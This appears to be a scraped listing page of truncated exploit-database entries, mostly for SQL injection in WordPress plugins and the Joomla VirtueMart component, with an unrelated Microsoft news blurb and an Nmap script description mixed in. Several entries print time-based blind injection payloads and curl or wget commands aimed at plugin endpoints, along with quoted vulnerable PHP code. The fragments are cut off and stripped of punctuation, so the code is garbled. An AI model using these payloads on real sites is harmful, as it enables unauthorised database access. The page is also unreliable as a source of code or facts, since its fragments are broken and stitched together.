WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability

No description provided by source. Exploit Title: WordPress AdRotate plugin = 3.6.6 SQL Injection Vulnerability Date: 2011-11-8 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip Version: 3.6.6 tested Note:...

WordPress Plugin AdRotate 3.6.6 - SQL Injection

Exploit Title: WordPress AdRotate plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0" encoded=echo -n "1' AND 1=IF21,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0" | base64 -w 0 curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded --------------- Vulnerab...

WordPress AdRotate plugin <= 3.6.6 SQL Injection

Exploit for php platform in category web applications Exploit Title: WordPress AdRotate plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0" encoded=echo -n "1' AND 1=IF21,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0" | base64 -w 0 curl...

Microsoft Invents New Way To Measure Online Safety (And Finds That Consumers Stink At It)

Computer users are taking steps to mitigate online security threats, but still only score a paltry 34 out of 100 – a solid “F” – according to a new study by Microsoft. The study, sponsored by Microsoft’s Trustworthy Computing Group TwC, introduces a new metric, the Microsoft Computing Safety Inde...

Simple Free PHP Forum Script 1 SQL Injection

Exploit Title: Simple Free PHP Forum Script 1,BENCHMARK500000000,MD5CHAR115,113,108,109,97,112,0 AND id='1 wget "http://127.0.0.1/forum/index.php?show=cat&id=1' AND 1=IF21,BENCHMARK500000000,MD5CHAR115,113,108,109,97,112,0 AND id='1" -------------- Vurnerable Code -------------- Line 150 of...

WordPress AdRotate 3.6.5 SQL Injection

Exploit Title: WordPress AdRotate plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0%23 --------------- Vulnerable code --------------- ifisset$GET'track' OR $GET'track' != '' $meta = urldecode$GET'track'; ... list$ad, $group, $block = explode"-", $meta; ... $bannerurl = $wpdb-getvar"SELEC...

WordPress Plugin Link Library 5.2.1 - SQL Injection

WordPress Plugin Link Library 5.2.1 - SQL Injection Exploit Title: WordPress Link Library plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0%23 --------------- Vulnerable code --------------- ./link-library-ajax.php: echo $mylinklibraryplugin-LinkLibrary...; ./link-library.php: class...

WordPress A To Z Category Listing 1.3 SQL Injection

Exploit Title: WordPress A to Z Category Listing plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $initletter = $GET'R'; $sql = "select from ".$tableprefix."terms wpt,".$tableprefix."termtaxonomy wptt where wpt.name like...

WordPress Plugin PureHTML 1.0.0 - SQL Injection

WordPress Plugin PureHTML 1.0.0 - SQL Injection Exploit Title: WordPress PureHTML plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- if!isset$POST'PureHTMLNOnce' if !wpverifynonce $POST'PureHTMLNOnce', pluginbasenameFILE...

WordPress Plugin Advertizer 1.0 - SQL Injection

Exploit Title: WordPress Advertizer plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $res = $wpdb-getrow"SELECT limitclicks, traceclicks FROM ".$wpdb-prefix."advvbase WHERE id = '".$POSTid."' limit 1;";...

WordPress Profiles 2.0 RC1 SQL Injection

Exploit Title: WordPress Profiles plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0--%20 --------------- Vulnerable code --------------- $query = "SELECT FROM ".$wpdb-prefix."bios WHERE id='$GETid'"; ... $result = mysqlquery$query;...

WordPress Plugin MM Duplicate 1.2 - SQL Injection

Exploit Title: WordPress MM Duplicate plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0 --------------- Vulnerable code --------------- class mmduplicatepagesposts ... function mmduplicatepagesposts ... addaction'init', array&$this, 'dup'; ... function dup if$GET'duplicate' $id =...

WordPress Plugin Ajax Gallery 3.0 - SQL Injection

WordPress Plugin Ajax Gallery 3.0 - SQL Injection Exploit Title: WordPress Ajax Gallery plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0 --------------- Vulnerable code --------------- if isset $GET 'delete' && isset $GET'gId' $wpdb-query "DELETE FROM $wpdb-options WHERE...

WordPress Plugin Allow PHP in Posts and Pages 2.0.0.RC1 - SQL Injection

Exploit Title: WordPress Allow PHP in Posts and Pages plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0 --------------- Vulnerable code --------------- if!isset$POST'allowPHPNonce' if !wpverifynonce $POST'allowPHPNonce', pluginbasenameFILE header"location:".$refer; else...

WordPress Plugin Allow PHP in Posts and Pages 2.0.0.RC1 - SQL Injection

WordPress Plugin Allow PHP in Posts and Pages 2.0.0.RC1 - SQL Injection Exploit Title: WordPress Allow PHP in Posts and Pages plugin 1,BENCHMARK5000000,MD5CHAR115,113,108,109,97,112,0 --------------- Vulnerable code --------------- if!isset$POST'allowPHPNonce' if !wpverifynonce...

Joomla 1.5 VirtueMart 1.1.7 Blind SQL Injection

Exploit Title: Joomla 1.5 comvirtuemart 'Joomla 1.5 VirtueMart Component %q A vulnerability was discovered by Rocco Calvi and Steve Seeley which identifies unauthenticated time-based blind SQL injection in the "page" variable of the virtuemart component. This vulnerability allows an attacker to...

Joomla 1.5 com_virtuemart &lt;= 1.1.7 Blind time-based SQL Injection (MSF)

No description provided by source. Exploit Title: Joomla 1.5 comvirtuemart = 1.1.7 blind time-based sql injection MSF module Date: Thu Jul 28, 2011 Author: TecR0c - tecr0c.mythsec @ gmail.com Version: = 1.1.7 Download: http://dev.virtuemart.net/projects/virtuemart/files Greetz: mythsec team, Jame...

Joomla! Component com_virtuemart 1.1.7/1.5 - Blind SQL Injection (Metasploit)

Exploit Title: Joomla 1.5 comvirtuemart 'Joomla 1.5 VirtueMart Component %q A vulnerability was discovered by Rocco Calvi and Steve Seeley which identifies unauthenticated time-based blind SQL injection in the "page" variable of the virtuemart component. This vulnerability allows an attacker to...

mysql-audit NSE Script

Audits MySQL database server security configuration against parts of the CIS MySQL v1.0.2 benchmark the engine can be used for other MySQL audits by creating appropriate audit files. Script Arguments mysql-audit.password the password with which to connect to the database mysql-audit.username the...

Joomla! Component com_virtuemart 1.1.7 - Blind SQL Injection

Joomla! Component comvirtuemart 1.1.7 - Blind SQL Injection !/usr/bin/python Joomla! comvirtuemart 46 million results Patch: http://dev.virtuemart.net/attachments/202/Patch-VirtueMart-1.1.7a.zip References: - http://www.stratsec.net/Research/Advisories/VirtueMart-SQL-Injection-SS-2011-003 -...